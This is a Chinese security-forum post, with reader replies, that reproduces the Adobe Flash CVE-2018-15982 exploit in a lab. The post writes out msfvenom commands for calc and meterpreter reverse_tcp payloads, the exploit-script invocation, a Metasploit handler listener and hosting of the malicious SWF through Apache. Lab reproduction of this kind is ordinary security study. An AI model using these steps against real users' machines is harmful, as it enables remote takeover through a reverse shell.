用户
搜索
  • TA的每日心情
    慵懒
    2019-1-9 23:15
  • 签到天数: 1 天

    连续签到: 1 天

    [LV.1]初来乍到

    安全团队

    1x2Bytes

    Rank: 7Rank: 7Rank: 7

    8

    主题

    45

    帖子

    192

    魔法币
    收听
    1
    粉丝
    1
    注册时间
    2017-12-31

    i春秋认证i春秋签约作者

    发表于 2018-12-23 10:07:17 3911075
    本帖最后由 Hacker1ee 于 2018-12-29 11:32 编辑

    CVE-2018-15983

    当地时间12月5日,Adobe官方发布安全通告修复了两个漏洞,分别是Adobe Flash Player中的0day漏洞CVE-2018-15982和Adobe Flash Player installer中的高危漏洞CVE-2018-15983。
    影响版本
    • Adobe Flash Player <= 31.0.0.153
    • Adobe Flash Player Installer<= 31.0.0.108
    复现环境
    • Windows7 SP1+Adobe Flash Player 30.x ActiveX
    • Linux + Metasploit Framework

    地址:https://github.com/B1eed/VulRec/blob/master/CVE-2018-15982

    生成弹计算器Payload

    msfVENOM -p windows/exec cmd=calc.exe -f raw > 86.bin
    
    msfvenom -p windows/x64/exec cmd=calc.exe -f raw > 64.bin
    
    python CVE-2018-15982.py -i 86.bin -I 64.bin -o apt.swf

    生成meterpreter反弹Payload

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4444 -f raw > 86.bin
    
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4444 -f raw > 64.bin

    Metasploit开启监听

    msf > use exploit/multi/handler
    
    Msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
    
    msf exploit(handler) > show options
    
    msf exploit(handler) > set lhost IP地址
    
    msf exploit(handler) > set lport 本地端口
    
    msf exploit(handler) > exploit

    开启Apache服务

                service  apache2 start

    把生成的弹计算器的exploit文件放到Web 服务目录下

    靶机访问

    然后生成meterpreter 反弹 Payload 的exploit文件,放到web 服务目录下

            python CVE-2018-15982.py -i 86.bin -I 64.bin -o apt.swf

    Msf开启监听

    靶机访问

    成功反弹

    复现成功

    如果还不明白可以看我上传到B站的视频哦
    https://www.bilibili.com/video/av38805644/
    觉得Ok给个币也没问题



    Adobe Flash Player 和 exploit地址
    游客,如果您要查看本帖隐藏内容请回复

    个人Blog:https://b1eed.github.io
    发表于 2018-12-25 17:05:47
    暂时没有实践,想带着问题实践,大佬有空帮忙解答下最好,Adobe Flash Player需要开启自动运行吗?一般不都是关闭着的吗?看你的截图是访问的首页,不需要访问生成的文件吗?
    使用道具 举报 回复
    发表于 2018-12-27 09:18:11
    本帖最后由 Hacker1ee 于 2018-12-27 01:49 编辑
    catmao 发表于 2018-12-25 09:05
    暂时没有实践,想带着问题实践,大佬有空帮忙解答下最好,Adobe Flash Player需要开启自动运行吗?一般不都 ...

    ......想了解加群,基础问题不想回答。
    个人Blog:https://b1eed.github.io
    使用道具 举报 回复
    发表于 2018-12-26 10:35:30
                   看看
    使用道具 举报 回复
    666666666666666666666666666666
    使用道具 举报 回复
    666666666666666666666666666666
    使用道具 举报 回复
    Adobe Flash Player 和 exploit地址
    使用道具 举报 回复
    我就是想下载下来复现下,哈哈
    使用道具 举报 回复
    学习一下来尝试本地复现一下
    使用道具 举报 回复
    前来学习一波
    使用道具 举报 回复
    发表于 2018-12-24 11:27:57
    学习下本地实现
    使用道具 举报 回复
    发表于 2018-12-24 11:46:48
    66666666666666666666
    使用道具 举报 回复
    发表于 2018-12-24 11:53:32
    学习一下
    使用道具 举报 回复
    发表于 2018-12-24 13:04:51
    嘀嘀嘀嘀嘀嘀
    使用道具 举报 回复
    发表于 2018-12-24 13:46:11
    3333333333333333333
    使用道具 举报 回复
    发表于 2018-12-24 13:50:52
    66666666666
    使用道具 举报 回复
    发表于 2018-12-24 13:59:57
    感谢分享
    我是祖国未来的花朵,社会主义未来的接班人!
    使用道具 举报 回复
    发表于 2018-12-24 15:23:37
    本地测试测试
    使用道具 举报 回复
    感谢分享,学习一波了
    使用道具 举报 回复
    发表于 2018-12-25 00:46:03
    先回复后下载
    使用道具 举报 回复
    发表于 2018-12-25 08:33:58
    谢谢楼主分享
    使用道具 举报 回复
    123下一页
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册